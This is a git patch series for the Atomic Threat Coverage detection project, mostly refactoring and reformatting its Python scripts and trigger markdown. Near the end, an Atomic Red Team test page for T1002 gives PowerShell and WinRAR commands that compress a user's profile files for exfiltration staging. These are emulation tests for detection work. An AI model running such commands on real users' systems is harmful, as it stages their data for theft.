From 9e21a0f898d85427d0612272bf64dee266918911 Mon Sep 17 00:00:00 2001 From: DemonWareXT Date: Wed, 25 May 2022 09:24:44 +0200 Subject: [PATCH 1/4] changed if statement to not fail when variable is unassigned --- scripts/es_index_export.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/scripts/es_index_export.py b/scripts/es_index_export.py index 83763844..de538590 100755 --- a/scripts/es_index_export.py +++ b/scripts/es_index_export.py @@ -133,7 +133,7 @@ def __init__(self): except: pass - if not date_created: + if not "date_created" in locals(): try: # in case somebody mixed up month and date, like in "Detection of SafetyKatz" date_created = datetime.datetime.strptime(alert['date'], '%Y/%d/%m').isoformat() @@ -154,7 +154,7 @@ def __init__(self): except: pass - if not date_modified: + if not "date_modified" in locals(): try: # in case somebody mixed up month and date, like in "Detection of SafetyKatz" date_modified = datetime.datetime.strptime(alert['modified'], '%Y/%d/%m').isoformat() From bd821c068adf3e17fff6339dacf11716e4db8b14 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?L=C3=A4ubli=20Linus=20=28laei=29?= Date: Wed, 25 May 2022 10:57:56 +0200 Subject: [PATCH 2/4] changed function name --- scripts/atcutils.py | 113 ++++++++++++++++++------------------- scripts/detectionrule.py | 4 +- scripts/es_index_export.py | 2 +- 3 files changed, 57 insertions(+), 62 deletions(-) diff --git a/scripts/atcutils.py b/scripts/atcutils.py index 5d3ed039..4cf834a8 100755 --- a/scripts/atcutils.py +++ b/scripts/atcutils.py @@ -28,7 +28,7 @@ DEFAULT_PROJECT_CONFIG_PATH = 'scripts/config.default.yml' DEFAULT_CONFIG_PATH = 'config.yml' -#Show warnings only once: +# Show warnings only once: with warnings.catch_warnings(): warnings.simplefilter("once") @@ -125,10 +125,11 @@ def __read_yaml_file(self, path): def get(self, key): """ Maps to 'get' Function of configuration {dict} object """ return self.config.get(key) - + config_local = property(get_config_local, set_config_local) config_project = property(get_config_project, set_config_project) + ## Initialize global config ATCconfig = ATCConfig() @@ -150,14 +151,13 @@ def read_rule_file(path): return rule_text @staticmethod - def get_normalized_field(field): + def get_normalized_field(field): # return everything before field modifier (pipe) regex = '^(.*?)\|' try: return re.search(regex, field).group(1) except: return field - @staticmethod def read_yaml_file(path): @@ -181,7 +181,7 @@ def read_yaml_file(path): else: result = buff_results[0] return result - + @staticmethod def load_config(path): """Load the configuration YAML files used ofr ATC into a dictionary @@ -203,7 +203,7 @@ def load_yamls(path): join(path, f) for f in listdir(path) if isfile(join(path, f)) if f.endswith('.yaml') - or f.endswith('.yml') + or f.endswith('.yml') ] result = [] @@ -249,7 +249,7 @@ def confluence_get_page_id(apipath, auth, space, title): url = apipath + "content" space_page_url = url + '?spaceKey=' + space + '&title=' \ - + title + '&expand=space' + + title + '&expand=space' response = requests.request( "GET", @@ -354,14 +354,14 @@ def push_to_confluence(data, apipath, auth): current_content = resp["body"]["storage"]["value"] - #if current_content == data["confluencecontent"]: + # if current_content == data["confluencecontent"]: # compare pages: revert changes in confluence page, remove \n \r \t \s conv = { ']*>': '', ']*>': '', ']*>': '', - '’': '’', - 'Ä€': 'Ā', + '’': '’', + 'Ä€': 'Ā', '\n': '', '\r': '', '\t': '', @@ -430,7 +430,7 @@ def sigma_lgsrc_fields_to_names(logsource_dict): """Get sigma logsource dict and rename key/values into our model, so we could use it for Data Needed calculation""" if logsource_dict: - + sigma_keys = [*sigma_mapping] proper_logsource_dict = {} for key, val in logsource_dict.items(): @@ -457,7 +457,7 @@ def sigma_lgsrc_fields_to_names(logsource_dict): proper_logsource_dict.update([ (key, val) ]) - + return proper_logsource_dict else: return {} @@ -480,7 +480,7 @@ def search_for_fields(detection_dict): continue for val in detection_dict[_field]: - if isinstance(val,str): + if isinstance(val, str): continue if isinstance( detection_dict[_field], @@ -584,18 +584,18 @@ def check_for_command_line_in_selection(detection_dict): if isinstance(_field, str): _field = ATCutils.get_normalized_field(_field) if _field == 'CommandLine' or \ - _field == 'ProcessCommandLine' or \ - _field == 'ProcesssCommandLine' or \ - _field == 'ParentCommandLine': - return True + _field == 'ProcessCommandLine' or \ + _field == 'ProcesssCommandLine' or \ + _field == 'ParentCommandLine': + return True if isinstance(_field, dict): for item in _field: item = ATCutils.get_normalized_field(item) - if item == 'CommandLine' or \ - item == 'ProcessCommandLine' or \ - item == 'ProcesssCommandLine' or \ - item == 'ParentCommandLine': + if item == 'CommandLine' or \ + item == 'ProcessCommandLine' or \ + item == 'ProcesssCommandLine' or \ + item == 'ParentCommandLine': return True return False @@ -627,7 +627,6 @@ def check_for_enrichment_presence(detection_rule_obj): else: return False - @staticmethod def get_logsource_of_the_document(detection_rule_obj): """get logsource for specific document (addition)""" @@ -646,9 +645,8 @@ def get_logsource_of_the_document(detection_rule_obj): return logsource - @staticmethod - def main_dn_calculatoin_func(dr_file_path): + def main_dn_calculation_func(dr_file_path): """you need to execute this function to calculate DN for DR file""" dn_list = ATCutils.load_yamls(ATCconfig.get('data_needed_dir')) @@ -659,7 +657,7 @@ def main_dn_calculatoin_func(dr_file_path): """For every Detection Rule we do: * calculate Date Needed per logsource or per logsource AND per selection) - it depentd on presence of event ID in the document + it depends on presence of event ID in the document - if there is event id for specific logsource — we calculate Data Needed Per SELECTION - if there is no event id for specific document — we calculate @@ -685,7 +683,7 @@ def main_dn_calculatoin_func(dr_file_path): if not detectionrule.get('additions'): logsource = ATCutils.get_logsource_of_the_document(detectionrule) - + event_id_based_dr = ATCutils.check_for_event_ids_presence(detectionrule) # if this is event id based detection rule we calculate PER SELECTION @@ -702,7 +700,7 @@ def main_dn_calculatoin_func(dr_file_path): has_command_line = \ ATCutils.check_for_command_line_in_selection( detectionrule['detection'][_field] - ) + ) final_list += ATCutils.calculate_dn_for_eventid_based_dr( dn_list, logsource, event_ids, has_command_line ) @@ -719,11 +717,11 @@ def main_dn_calculatoin_func(dr_file_path): continue try: - detection_fields = ATCutils\ - .search_for_fields2(detectionrule['detection'][_field]) + detection_fields = ATCutils \ + .search_for_fields2(detectionrule['detection'][_field]) except Exception as e: - detection_fields = ATCutils\ - .search_for_fields(detectionrule['detection']) + detection_fields = ATCutils \ + .search_for_fields(detectionrule['detection']) if detection_fields: for field in detection_fields: @@ -759,12 +757,12 @@ def main_dn_calculatoin_func(dr_file_path): # check if first document has logsource logsource = ATCutils.get_logsource_of_the_document(detectionrule) if logsource: - + event_id_based_dr = ATCutils.check_for_event_ids_presence(detectionrule) if event_id_based_dr: if detectionrule.get('detection'): - # just in case there are multiple selections in first document + # just in case there are multiple selections in first document for _field in detectionrule.get('detection'): if str(_field) in ["condition", "timeframe"]: @@ -776,9 +774,9 @@ def main_dn_calculatoin_func(dr_file_path): has_command_line = \ ATCutils.check_for_command_line_in_selection( detectionrule['detection'][_field] - ) + ) final_list += ATCutils.calculate_dn_for_eventid_based_dr( - dn_list, logsource, event_ids, has_command_line + dn_list, logsource, event_ids, has_command_line ) else: full_list_of_fields = [] @@ -791,11 +789,11 @@ def main_dn_calculatoin_func(dr_file_path): continue try: - detection_fields = ATCutils\ - .search_for_fields2(detectionrule['detection'][_field]) + detection_fields = ATCutils \ + .search_for_fields2(detectionrule['detection'][_field]) except Exception as e: - detection_fields = ATCutils\ - .search_for_fields(detectionrule['detection']) + detection_fields = ATCutils \ + .search_for_fields(detectionrule['detection']) if detection_fields: for field in detection_fields: @@ -805,12 +803,11 @@ def main_dn_calculatoin_func(dr_file_path): final_list += ATCutils.calculate_dn_for_non_eventid_based_dr( dn_list, full_list_of_fields, logsource) - # then let's calculate Data Needed per EACH SELECTION of different logsources for addition in detectionrule['additions']: logsource = ATCutils.get_logsource_of_the_document(addition) - + event_id_based_dr = ATCutils.check_for_event_ids_presence(addition) if event_id_based_dr: @@ -825,9 +822,9 @@ def main_dn_calculatoin_func(dr_file_path): has_command_line = \ ATCutils.check_for_command_line_in_selection( addition['detection'][_field] - ) + ) final_list += ATCutils.calculate_dn_for_eventid_based_dr( - dn_list, logsource, event_ids, has_command_line + dn_list, logsource, event_ids, has_command_line ) else: full_list_of_fields = [] @@ -836,17 +833,17 @@ def main_dn_calculatoin_func(dr_file_path): if addition.get('detection'): # just in case there are multiple selections in first document for _field in addition['detection']: - + if str(_field) in ["condition", "timeframe"]: continue - + try: - detection_fields = ATCutils\ - .search_for_fields2(addition['detection'][_field]) + detection_fields = ATCutils \ + .search_for_fields2(addition['detection'][_field]) except Exception as e: - detection_fields = ATCutils\ - .search_for_fields(addition['detection']) - + detection_fields = ATCutils \ + .search_for_fields(addition['detection']) + if detection_fields: for field in detection_fields: if field not in full_list_of_fields: @@ -888,13 +885,12 @@ def calculate_dn_for_eventid_based_dr( if 'platform' in x and 'channel' in x: if x.get('platform') == y.get('platform') and x.get( - 'channel') == y.get('channel'): + 'channel') == y.get('channel'): list_of_DN_matched_by_logsource.append(dn) else: if x.get('platform') == y.get('platform'): list_of_DN_matched_by_logsource.append(dn) - # find all Data Needed which matched by logsource section from # Detection Rule AND EventID @@ -906,14 +902,14 @@ def calculate_dn_for_eventid_based_dr( eventID_from_title = "None" if has_command_line == True and dn['title'] == \ - "DN_0001_4688_windows_process_creation": + "DN_0001_4688_windows_process_creation": continue if isinstance(event_ids, list): for eid in event_ids: if eventID_from_title == str(eid): - list_of_DN_matched_by_logsource_and_eventid\ + list_of_DN_matched_by_logsource_and_eventid \ .append(dn) elif eventID_from_title == str(event_ids): list_of_DN_matched_by_logsource_and_eventid.append(dn) @@ -958,7 +954,6 @@ def calculate_dn_for_non_eventid_based_dr( # if they are equal, do.. list_of_DN_matched_by_fields.append(dn) - for matched_dn in list_of_DN_matched_by_fields: y = matched_dn @@ -967,11 +962,11 @@ def calculate_dn_for_non_eventid_based_dr( if x.get('category') == "process_creation": # should take care about unix events in future: todo if x.get('platform') == y.get('platform') and "process_creation" \ - in y.get('title'): + in y.get('title'): list_of_DN_matched_by_fields_and_logsource.append(matched_dn) elif 'platform' in x and 'channel' in x: if x.get('platform') == y.get('platform') and x.get( - 'channel') == y.get('channel'): + 'channel') == y.get('channel'): list_of_DN_matched_by_fields_and_logsource.append(matched_dn) else: if x.get('platform') == y.get('platform'): @@ -992,9 +987,9 @@ def write_file(path, content, options="w+"): @staticmethod def populate_tg_markdown( art_dir='../' + - read_yaml_file.__func__('config.yml').get('triggers_directory'), + read_yaml_file.__func__('config.yml').get('triggers_directory'), atc_dir='../' + - read_yaml_file.__func__('config.yml').get('md_name_of_root_directory')): + read_yaml_file.__func__('config.yml').get('md_name_of_root_directory')): cmd = ('find \'%s/\' -name "T*.md" -exec' + ' cp {} \'%sTriggers/\' \;') % (art_dir, atc_dir) if subprocess.run(cmd, shell=True, check=True).returncode == 0: diff --git a/scripts/detectionrule.py b/scripts/detectionrule.py index 43b1ee39..153db018 100755 --- a/scripts/detectionrule.py +++ b/scripts/detectionrule.py @@ -121,7 +121,7 @@ def render_template(self, template_type): self.fields.update({"queries": queries}) # Data Needed - data_needed = ATCutils.main_dn_calculatoin_func(self.yaml_file) + data_needed = ATCutils.main_dn_calculation_func(self.yaml_file) # if there is only 1 element in the list, print it as a string, # without quotes @@ -266,7 +266,7 @@ def render_template(self, template_type): self.fields.update({"queries": queries}) # Data Needed - data_needed = ATCutils.main_dn_calculatoin_func(self.yaml_file) + data_needed = ATCutils.main_dn_calculation_func(self.yaml_file) data_needed_with_id = [] diff --git a/scripts/es_index_export.py b/scripts/es_index_export.py index de538590..26bad421 100755 --- a/scripts/es_index_export.py +++ b/scripts/es_index_export.py @@ -106,7 +106,7 @@ def __init__(self): enrichments = [er for er in enrichments_list if er['title'] in alert.get('enrichment', [{'title':'-'}])] if len(enrichments) < 1: enrichments = [{'title': 'not defined'}] - dn_titles = ATCutils.main_dn_calculatoin_func(path) + dn_titles = ATCutils.main_dn_calculation_func(path) alert_dns = [data for data in dn_list if data['title'] in dn_titles] if len(alert_dns) < 1: alert_dns = [{'category': 'not defined', From c25f9252378b8cb11c27f574db216706a60f7263 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?L=C3=A4ubli=20Linus=20=28laei=29?= Date: Wed, 25 May 2022 11:06:23 +0200 Subject: [PATCH 3/4] optimised formatting --- main.py | 39 +++++++++++++++++++-------------------- 1 file changed, 19 insertions(+), 20 deletions(-) diff --git a/main.py b/main.py index cfaba264..ff11ec3c 100755 --- a/main.py +++ b/main.py @@ -97,14 +97,13 @@ group2.add_argument('-UC', '--usecases', action='store_true', help='Build response use case part') - # Init capabilities parser.add_argument('-i', '--init', action='store_true', help="Build initial pages or directories " + - "depending on the export type") + "depending on the export type") # Input parser.add_argument('--vis-input', help="Provide input file for " + - "visualisations module") + "visualisations module") # Output parser.add_argument('--vis-output-dir', help=""" Provide directory path where to save output for visualisations module. @@ -114,16 +113,16 @@ ${exported_analytics_directory}/dashboards/ """) parser.add_argument('--vis-output-file-name', help="Provide file name " + - "which will be used to save a file in output " + - "directory\nDefault is: [randomstring].yml") + "which will be used to save a file in output " + + "directory\nDefault is: [randomstring].yml") # Force parser.add_argument('--vis-force', action='store_true', help="Force visualisations module to not use Kibana") # Export type parser.add_argument('--vis-export-type', help="Switch JSON export type " + - "from api (uploaded using curl) to gui (imported in " + - "kibana)", required=False, default="api", const="gui", + "from api (uploaded using curl) to gui (imported in " + + "kibana)", required=False, default="api", const="gui", action="store_const") args = parser.parse_args() @@ -132,13 +131,13 @@ UpdateAttackMapping() PopulateMarkdown(auto=args.auto, ms=args.mitigationsystem, mp=args.mitigationpolicy, dr=args.detectionrule, - tg=args.triggers, cu=args.customers, uc=args.usecases, - hp=args.hardeningpolicy,init=args.init) + tg=args.triggers, cu=args.customers, uc=args.usecases, + hp=args.hardeningpolicy, init=args.init) ReactPopulateMarkdown(auto=args.auto, ra=args.responseactions, rp=args.responseplaybook, rs=args.responsestage, init=args.init) DataPopulateMarkdown(auto=args.auto, lp=args.loggingpolicy, - dn=args.dataneeded,en=args.enrichment, + dn=args.dataneeded, en=args.enrichment, init=args.init) elif args.confluence: @@ -150,13 +149,13 @@ auth = HTTPBasicAuth(mail, password) UpdateAttackMapping() DataPopulateConfluence(auth=auth, auto=args.auto, lp=args.loggingpolicy, - dn=args.dataneeded,en=args.enrichment, - init=args.init) - PopulateConfluence(auth=auth, auto=args.auto, ms=args.mitigationsystem, - mp=args.mitigationpolicy, dr=args.detectionrule, - tg=args.triggers, cu=args.customers, uc=args.usecases, - hp=args.hardeningpolicy, init=args.init) - ReactPopulateConfluence(auth=auth, auto=args.auto, + dn=args.dataneeded, en=args.enrichment, + init=args.init) + PopulateConfluence(auth=auth, auto=args.auto, ms=args.mitigationsystem, + mp=args.mitigationpolicy, dr=args.detectionrule, + tg=args.triggers, cu=args.customers, uc=args.usecases, + hp=args.hardeningpolicy, init=args.init) + ReactPopulateConfluence(auth=auth, auto=args.auto, ra=args.responseactions, rp=args.responseplaybook, rs=args.responsestage, init=args.init) elif args.react_stix: @@ -209,7 +208,7 @@ file[:-4] + ".json", args.vis_force, args.vis_export_type) print("File path: %s" % (output_path + "_" + - file[:-4] + ".json")) + file[:-4] + ".json")) else: YamlHandler(args.vis_input, output_path2 + ".json", args.vis_force, args.vis_export_type) @@ -222,8 +221,8 @@ print("HINT: Make sure proper directories are " + "configured in the config.yml") if ATCconfig.get( - 'response_playbooks_dir', - ATCconfig2.get('response_playbooks_dir')) and \ + 'response_playbooks_dir', + ATCconfig2.get('response_playbooks_dir')) and \ ATCconfig.get( 'response_actions_dir', ATCconfig2.get('response_actions_dir')) and \ From 3ce60b23787b3beb5c66580d52e038341805499a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?L=C3=A4ubli=20Linus=20=28laei=29?= Date: Wed, 25 May 2022 13:04:59 +0200 Subject: [PATCH 4/4] reformatted code --- .travis.yml | 2 +- Atomic_Threat_Coverage/Triggers/T1002.md | 106 +- Atomic_Threat_Coverage/Triggers/T1003.md | 477 +- Atomic_Threat_Coverage/Triggers/T1004.md | 55 +- Atomic_Threat_Coverage/Triggers/T1005.md | 26 +- Atomic_Threat_Coverage/Triggers/T1007.md | 36 +- Atomic_Threat_Coverage/Triggers/T1009.md | 25 +- Atomic_Threat_Coverage/Triggers/T1010.md | 29 +- Atomic_Threat_Coverage/Triggers/T1012.md | 25 +- Atomic_Threat_Coverage/Triggers/T1014.md | 49 +- Atomic_Threat_Coverage/Triggers/T1015.md | 49 +- Atomic_Threat_Coverage/Triggers/T1016.md | 94 +- Atomic_Threat_Coverage/Triggers/T1018.md | 145 +- Atomic_Threat_Coverage/Triggers/T1022.md | 66 +- Atomic_Threat_Coverage/Triggers/T1023.md | 36 +- Atomic_Threat_Coverage/Triggers/T1027.md | 83 +- Atomic_Threat_Coverage/Triggers/T1028.md | 81 +- Atomic_Threat_Coverage/Triggers/T1030.md | 16 +- Atomic_Threat_Coverage/Triggers/T1031.md | 25 +- Atomic_Threat_Coverage/Triggers/T1032.md | 17 +- Atomic_Threat_Coverage/Triggers/T1033.md | 42 +- Atomic_Threat_Coverage/Triggers/T1035.md | 46 +- Atomic_Threat_Coverage/Triggers/T1036.md | 161 +- Atomic_Threat_Coverage/Triggers/T1037.md | 116 +- Atomic_Threat_Coverage/Triggers/T1038.md | 40 +- Atomic_Threat_Coverage/Triggers/T1040.md | 70 +- Atomic_Threat_Coverage/Triggers/T1042.md | 28 +- Atomic_Threat_Coverage/Triggers/T1044.md | 62 +- Atomic_Threat_Coverage/Triggers/T1046.md | 40 +- Atomic_Threat_Coverage/Triggers/T1047.md | 103 +- Atomic_Threat_Coverage/Triggers/T1048.md | 104 +- Atomic_Threat_Coverage/Triggers/T1049.md | 58 +- Atomic_Threat_Coverage/Triggers/T1050.md | 56 +- Atomic_Threat_Coverage/Triggers/T1053.md | 67 +- Atomic_Threat_Coverage/Triggers/T1055.md | 148 +- Atomic_Threat_Coverage/Triggers/T1056.md | 34 +- Atomic_Threat_Coverage/Triggers/T1057.md | 37 +- Atomic_Threat_Coverage/Triggers/T1058.md | 29 +- Atomic_Threat_Coverage/Triggers/T1059.md | 25 +- Atomic_Threat_Coverage/Triggers/T1060.md | 81 +- Atomic_Threat_Coverage/Triggers/T1062.md | 20 +- Atomic_Threat_Coverage/Triggers/T1063.md | 78 +- Atomic_Threat_Coverage/Triggers/T1064.md | 50 +- Atomic_Threat_Coverage/Triggers/T1065.md | 34 +- Atomic_Threat_Coverage/Triggers/T1069.md | 85 +- Atomic_Threat_Coverage/Triggers/T1070.md | 134 +- Atomic_Threat_Coverage/Triggers/T1071.md | 142 +- Atomic_Threat_Coverage/Triggers/T1073.md | 29 +- Atomic_Threat_Coverage/Triggers/T1074.md | 53 +- Atomic_Threat_Coverage/Triggers/T1075.md | 40 +- Atomic_Threat_Coverage/Triggers/T1076.md | 59 +- Atomic_Threat_Coverage/Triggers/T1077.md | 77 +- Atomic_Threat_Coverage/Triggers/T1081.md | 67 +- Atomic_Threat_Coverage/Triggers/T1082.md | 128 +- Atomic_Threat_Coverage/Triggers/T1083.md | 65 +- Atomic_Threat_Coverage/Triggers/T1084.md | 16 +- Atomic_Threat_Coverage/Triggers/T1085.md | 126 +- Atomic_Threat_Coverage/Triggers/T1086.md | 219 +- Atomic_Threat_Coverage/Triggers/T1087.md | 175 +- Atomic_Threat_Coverage/Triggers/T1088.md | 122 +- Atomic_Threat_Coverage/Triggers/T1089.md | 322 +- Atomic_Threat_Coverage/Triggers/T1090.md | 46 +- Atomic_Threat_Coverage/Triggers/T1093.md | 17 +- Atomic_Threat_Coverage/Triggers/T1095.md | 61 +- Atomic_Threat_Coverage/Triggers/T1096.md | 35 +- Atomic_Threat_Coverage/Triggers/T1097.md | 30 +- Atomic_Threat_Coverage/Triggers/T1098.md | 31 +- Atomic_Threat_Coverage/Triggers/T1099.md | 128 +- Atomic_Threat_Coverage/Triggers/T1100.md | 26 +- Atomic_Threat_Coverage/Triggers/T1101.md | 17 +- Atomic_Threat_Coverage/Triggers/T1102.md | 41 +- Atomic_Threat_Coverage/Triggers/T1103.md | 43 +- Atomic_Threat_Coverage/Triggers/T1105.md | 162 +- Atomic_Threat_Coverage/Triggers/T1107.md | 194 +- Atomic_Threat_Coverage/Triggers/T1110.md | 44 +- Atomic_Threat_Coverage/Triggers/T1112.md | 113 +- Atomic_Threat_Coverage/Triggers/T1113.md | 59 +- Atomic_Threat_Coverage/Triggers/T1114.md | 36 +- Atomic_Threat_Coverage/Triggers/T1115.md | 34 +- Atomic_Threat_Coverage/Triggers/T1117.md | 81 +- Atomic_Threat_Coverage/Triggers/T1118.md | 167 +- Atomic_Threat_Coverage/Triggers/T1119.md | 62 +- Atomic_Threat_Coverage/Triggers/T1121.md | 55 +- Atomic_Threat_Coverage/Triggers/T1123.md | 19 +- Atomic_Threat_Coverage/Triggers/T1124.md | 38 +- Atomic_Threat_Coverage/Triggers/T1126.md | 48 +- Atomic_Threat_Coverage/Triggers/T1127.md | 66 +- Atomic_Threat_Coverage/Triggers/T1128.md | 25 +- Atomic_Threat_Coverage/Triggers/T1130.md | 35 +- Atomic_Threat_Coverage/Triggers/T1132.md | 17 +- Atomic_Threat_Coverage/Triggers/T1135.md | 82 +- Atomic_Threat_Coverage/Triggers/T1136.md | 89 +- Atomic_Threat_Coverage/Triggers/T1137.md | 72 +- Atomic_Threat_Coverage/Triggers/T1138.md | 67 +- Atomic_Threat_Coverage/Triggers/T1139.md | 17 +- Atomic_Threat_Coverage/Triggers/T1140.md | 48 +- Atomic_Threat_Coverage/Triggers/T1141.md | 36 +- Atomic_Threat_Coverage/Triggers/T1142.md | 31 +- Atomic_Threat_Coverage/Triggers/T1143.md | 32 +- Atomic_Threat_Coverage/Triggers/T1144.md | 33 +- Atomic_Threat_Coverage/Triggers/T1145.md | 71 +- Atomic_Threat_Coverage/Triggers/T1146.md | 81 +- Atomic_Threat_Coverage/Triggers/T1147.md | 17 +- Atomic_Threat_Coverage/Triggers/T1148.md | 27 +- Atomic_Threat_Coverage/Triggers/T1150.md | 20 +- Atomic_Threat_Coverage/Triggers/T1151.md | 19 +- Atomic_Threat_Coverage/Triggers/T1152.md | 19 +- Atomic_Threat_Coverage/Triggers/T1153.md | 32 +- Atomic_Threat_Coverage/Triggers/T1154.md | 16 +- Atomic_Threat_Coverage/Triggers/T1155.md | 29 +- Atomic_Threat_Coverage/Triggers/T1156.md | 38 +- Atomic_Threat_Coverage/Triggers/T1158.md | 189 +- Atomic_Threat_Coverage/Triggers/T1159.md | 25 +- Atomic_Threat_Coverage/Triggers/T1160.md | 23 +- Atomic_Threat_Coverage/Triggers/T1163.md | 19 +- Atomic_Threat_Coverage/Triggers/T1164.md | 34 +- Atomic_Threat_Coverage/Triggers/T1165.md | 21 +- Atomic_Threat_Coverage/Triggers/T1166.md | 50 +- Atomic_Threat_Coverage/Triggers/T1168.md | 70 +- Atomic_Threat_Coverage/Triggers/T1169.md | 19 +- Atomic_Threat_Coverage/Triggers/T1170.md | 73 +- Atomic_Threat_Coverage/Triggers/T1173.md | 39 +- Atomic_Threat_Coverage/Triggers/T1174.md | 32 +- Atomic_Threat_Coverage/Triggers/T1176.md | 53 +- Atomic_Threat_Coverage/Triggers/T1179.md | 46 +- Atomic_Threat_Coverage/Triggers/T1180.md | 26 +- Atomic_Threat_Coverage/Triggers/T1183.md | 62 +- Atomic_Threat_Coverage/Triggers/T1191.md | 57 +- Atomic_Threat_Coverage/Triggers/T1193.md | 27 +- Atomic_Threat_Coverage/Triggers/T1196.md | 32 +- Atomic_Threat_Coverage/Triggers/T1197.md | 60 +- Atomic_Threat_Coverage/Triggers/T1201.md | 112 +- Atomic_Threat_Coverage/Triggers/T1202.md | 39 +- Atomic_Threat_Coverage/Triggers/T1204.md | 94 +- Atomic_Threat_Coverage/Triggers/T1206.md | 45 +- Atomic_Threat_Coverage/Triggers/T1207.md | 29 +- Atomic_Threat_Coverage/Triggers/T1208.md | 38 +- Atomic_Threat_Coverage/Triggers/T1214.md | 29 +- Atomic_Threat_Coverage/Triggers/T1215.md | 26 +- Atomic_Threat_Coverage/Triggers/T1216.md | 52 +- Atomic_Threat_Coverage/Triggers/T1217.md | 83 +- Atomic_Threat_Coverage/Triggers/T1218.md | 186 +- Atomic_Threat_Coverage/Triggers/T1219.md | 28 +- Atomic_Threat_Coverage/Triggers/T1220.md | 104 +- Atomic_Threat_Coverage/Triggers/T1222.md | 242 +- Atomic_Threat_Coverage/Triggers/T1223.md | 42 +- Atomic_Threat_Coverage/Triggers/T1482.md | 42 +- Atomic_Threat_Coverage/Triggers/T1485.md | 58 +- Atomic_Threat_Coverage/Triggers/T1489.md | 71 +- Atomic_Threat_Coverage/Triggers/T1490.md | 121 +- Atomic_Threat_Coverage/Triggers/T1496.md | 22 +- Atomic_Threat_Coverage/Triggers/T1500.md | 28 +- Atomic_Threat_Coverage/Triggers/T1501.md | 37 +- Atomic_Threat_Coverage/Triggers/T1502.md | 40 +- Atomic_Threat_Coverage/Triggers/T1504.md | 34 +- Atomic_Threat_Coverage/Triggers/T1505.md | 57 +- CONTRIBUTING.md | 36 +- DEVELOP.md | 40 +- README.md | 242 +- README_PL.md | 231 +- README_RU.md | 301 +- analytics/generated/atc_es_index.json | 29204 +++++++++++++++- .../atc_attack_navigator_profile.json | 5249 ++- ...avigator_profile_CU_0001_TESTCUSTOMER.json | 174 +- ...vigator_profile_CU_0002_TESTCUSTOMER2.json | 111 +- .../generated/react_navigator_profile.json | 1019 +- .../RP_0001_phishing_email.json | 266 +- .../predefined/atc-analytics-dashboard.json | 5 +- .../atc-analytics-index-pattern.json | 12 +- .../atc-analytics-index-template.json | 98 +- mkdocs.yml | 18 +- scripts/amitt_mapping.py | 2 +- .../atc_visualizations/DEVELOPMENT_README.md | 20 +- scripts/atc_visualizations/README.md | 37 +- scripts/atc_visualizations/TODO.md | 2 +- scripts/atc_visualizations/aggs.py | 20 +- scripts/atc_visualizations/base.py | 8 +- scripts/atc_visualizations/dashboard.py | 8 +- scripts/atc_visualizations/kibana_api.py | 2 +- scripts/atc_visualizations/metrics.py | 11 + scripts/atc_visualizations/params.py | 1 + scripts/atc_visualizations/visualisation.py | 39 +- scripts/atc_visualizations/yaml_handler.py | 8 +- scripts/attack_mapping.py | 2 +- scripts/attack_navigator_export.py | 24 +- .../attack_navigator_per_customer_export.py | 29 +- scripts/customer.py | 7 +- scripts/detectionrule.py | 69 +- scripts/es_index_export.py | 133 +- scripts/hardeningpolicy.py | 16 +- scripts/init_confluence.py | 7 +- scripts/init_markdown.py | 2 +- scripts/mitigationpolicy.py | 7 +- scripts/mitigationsystem.py | 3 +- scripts/populateconfluence.py | 42 +- scripts/populatemarkdown.py | 4 +- scripts/triggers.py | 5 +- scripts/update_amitt_mapping.py | 5 +- scripts/update_attack_mapping.py | 5 +- scripts/usecases.py | 9 +- tests/conftest.py | 1 - tests/test_syntax.py | 1 - 202 files changed, 40099 insertions(+), 7488 deletions(-) diff --git a/.travis.yml b/.travis.yml index 46782a63..738f0ff3 100644 --- a/.travis.yml +++ b/.travis.yml @@ -1,7 +1,7 @@ dist: xenial language: python python: - - "3.7" + - "3.7" install: pip install -r requirements.txt diff --git a/Atomic_Threat_Coverage/Triggers/T1002.md b/Atomic_Threat_Coverage/Triggers/T1002.md index 7e527c7b..96624c02 100644 --- a/Atomic_Threat_Coverage/Triggers/T1002.md +++ b/Atomic_Threat_Coverage/Triggers/T1002.md @@ -1,5 +1,7 @@ # T1002 - Data Compressed + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1002) +
An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network. The compression is done separately from the exfiltration channel and is performed using a custom program or algorithm, or a more common compression library or utility such as 7zip, RAR, ZIP, or zlib.
## Atomic Tests @@ -14,54 +16,48 @@ - [Atomic Test #5 - Data Compressed - nix - tar Folder or File](#atomic-test-5---data-compressed---nix---tar-folder-or-file) -
## Atomic Test #1 - Compress Data for Exfiltration With PowerShell + An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. -When the test completes you should find the files from the $env:USERPROFILE directory compressed in a file called T1002-data-ps.zip in the $env:USERPROFILE directory +When the test completes you should find the files from the $env:USERPROFILE directory compressed in a file called +T1002-data-ps.zip in the $env:USERPROFILE directory **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | input_file | Path that should be compressed into our output file | Path | $env:USERPROFILE| | output_file | Path where resulting compressed data should be placed | Path | $env:USERPROFILE\T1002-data-ps.zip| - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell dir #{input_file} -Recurse | Compress-Archive -DestinationPath #{output_file} ``` #### Cleanup Commands: + ```powershell Remove-Item -path #{output_file} -ErrorAction Ignore ``` - - - -

## Atomic Test #2 - Compress Data for Exfiltration With Rar + An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. -When the test completes you should find the txt files from the %USERPROFILE% directory compressed in a file called T1002-data.rar in the %USERPROFILE% directory +When the test completes you should find the txt files from the %USERPROFILE% directory compressed in a file called +T1002-data.rar in the %USERPROFILE% directory **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | input_path | Path that should be compressed into our output file | Path | %USERPROFILE%| @@ -70,28 +66,30 @@ When the test completes you should find the txt files from the %USERPROFILE% dir | rar_installer | Winrar installer | Path | %TEMP%\winrar.exe| | rar_exe | The RAR executable from Winrar | Path | %programfiles%/WinRAR/Rar.exe| - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd "#{rar_exe}" a -r #{output_file} #{input_path}\*#{file_extension} ``` #### Cleanup Commands: + ```cmd del /f /q /s #{output_file} >nul 2>&1 ``` - - #### 